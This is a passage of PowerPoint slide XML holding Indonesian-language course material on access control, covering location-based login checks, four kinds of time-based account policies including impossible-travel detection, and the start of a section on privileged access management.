              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>triangulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, hotspot Wi-Fi, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bluetooth di mana GPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Waktu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>empat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembatasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> jam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>durasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maksimum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perjalanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melacak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ambang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> batas, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di New York City. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> jam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Los Angeles, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimunculkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20816175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Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses Istimewa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memodifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada host, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
